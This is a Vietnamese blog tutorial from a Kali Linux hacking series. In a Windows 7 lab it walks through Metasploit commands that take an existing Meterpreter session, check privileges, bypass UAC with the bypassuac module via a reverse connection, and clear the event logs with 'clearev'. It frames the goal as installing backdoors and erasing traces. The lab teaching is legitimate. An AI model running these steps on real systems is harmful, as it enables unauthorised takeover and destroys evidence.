Nâng quyền làm gì?
Nâng quyền, leo thang bậc quyền hay chiếm quyền root là một bước cần thiết sau khi khai thác xâm nhập được vào mục tiêu. Việc này nhằm để kiểm soát được toàn bộ hệ thống của nạn nhân rồi từ đó ta có thể thực hiện thay đổi dữ liệu, cài backdoor, xóa dấu vết mà không bị giới hạn bởi quyền. Đối với các máy tính Linux thì quyền cao nhất chính là quyền root, còn Windows chính là quyền Administrator.
Môi trường thực hành:
Các máy ảo cần thiết để thực hành bao gồm:
- Kali Linux 2016 - amd64 (giả sử có địa chỉ IP là 172.16.100.3).
- Windows 7 SP1 - 32 bit (giả sử có địa chỉ IP là 172.16.100.5).
Nếu chưa có hệ thống lab thì bạn có thể xem lại bài một - hướng dẫn dựng lab thực hành để chuẩn bị.
Trường hợp giả định:
Sau khi ta có một session Meterpreter đang chạy trên mục tiêu, và việc tiếp theo ta cần làm là kiểm tra phiên bản hệ điều hành, cấu hình hệ thống và quyền hạn hiện có, và thực hành nâng quyền lên Administrator.Vượt qua UAC và chiếm quyền Administrator. |
Bắt đầu thực hành:
Kiểm tra phiên bản hệ điều hành:
meterpreter > sysinfo
Lệnh sysinfo |
Tiếp theo là xem quyền hiện có và thiếp lập UAC có đang bật không? Ta có thể sử dụng post/windows/gather/win_privs từ msf > bằng lệnh use và exploit, tuy nhiên phải thiết lập tham số SESSION.
Ở đây, ta có thể chạy thẳng trên meterpreter > bằng lệnh run như sau:
meterpreter > run post/windows/gather/win_privs
post/windows/gather/win_privs |
Có thể bạn đã biết (hoặc chưa) thì để chạy một ứng dụng với quyền Administrator trên Windows bạn phải vượt qua một bước xác nhận của UAC (User Account Control), vậy thì việc trước mắt ta cần phải làm đó là tắt UAC đi.
Tạm thời tắt meterpreter > đi, quay lại với msf >:
meterpreter > background
và hãy tìm kiếm một cái gì đó liên quan đến UAC mà ta có thể sử dụng được nào.
msf > search uac
search uac |
msf > use exploit/windows/local/bypassuac
Tiếp theo là xem và thiết lập các tham số. Rồi cho chạy exploit đó:
msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set SESSION <ID>
msf exploit(bypassuac) > exploit
Hãy thay <ID> lại thành ID của một session đang chạy.
Nếu kết quả thu được báo lỗi không thành công vì không thể nhận dữ liệu trên port 4444.
Vậy thì hãy thiết lập lại tham số LPORT bằng một giá trị khác và cho chạy lại. Ví dụ:
msf exploit(bypassuac) > set LHOST 172.16.100.3
msf exploit(bypassuac) > set LPORT 8080
msf exploit(bypassuac) > exploit
chạy exploit |
post/windows/gather/win_privs |
meterpreter > clearev
Lời kết:
Xin lỗi các bạn vì mình lại phải điều chỉnh lại nội dung một lần nữa, đây sẽ là nội dung chính thức của phần 5 thuộc series Hacking cơ bản với Kali Linux.
Nhất định ở phần sau ta sẽ bước vào Infomation Gathering - Thu thập thông tin, một lần nữa xin lỗi các bạn!
0 Comments